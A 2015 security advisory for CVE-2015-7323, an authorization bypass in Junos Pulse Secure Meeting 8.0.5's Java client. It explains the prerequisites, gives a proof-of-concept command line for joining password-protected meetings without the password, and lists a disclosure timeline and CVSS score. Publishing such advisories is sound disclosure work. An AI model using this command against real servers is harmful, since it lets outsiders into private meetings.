Junos Pulse Secure Meeting 8.0.5 Access Bypass
Posted on 26 September 2015
Profundis Labs Security Advisory https://profundis-labs.com/advisories/CVE-2015-7323.txt Product: ================================ Junos Pulse Secure Meeting Secure Meeting is a part of the Junos Puls Collaboration software, which allows you to organize and holding virtual meetings with internal and external users via the Juniper Access Gateway. Vulnerability Type: =================== Insufficient Authorization Checks CVE Reference: ============== CVE-2015-7323 VENDOR Reference: ================= https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054 Vulnerability Details: ===================== It is possible to enter "secure" meetings without knowledge of the password and the invitation link using the java fat client (meetingAppSun.jar). To access such meetings the following information is required: - A valid sessionID (DSID). This sessionID can be obtained by either having an invitation link to any other meeting or the user has a valid account to log into junos pulse using the http login form. - The meeting ID The meeting ID is a 7-8 digits number which may be gained using brute force or via CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt) Note: The vulnerability is only related to the java fat client. If a user tries to access a secure meeting using the web browser ( https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required. PoC code(s): =============== Example how to start the java fat client to access a meeting A from the command line: java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C" PARAM_A = meeting ID of Meeting A PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server PARAM_C = a valid sessionID PARAM_D = the domain/IP of the Junos Pulse server Disclosure Timeline: ========================================================= Vendor Notification: 01/2015 Vendor Confirmation: 03/2015 Vendor Patch Release: 06/2015 Public Disclosure: 09/2015 Affected Version: ========================================================= 8.0.5 Exploitation Technique: ======================= Remote Severity Level: ========================================================= CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)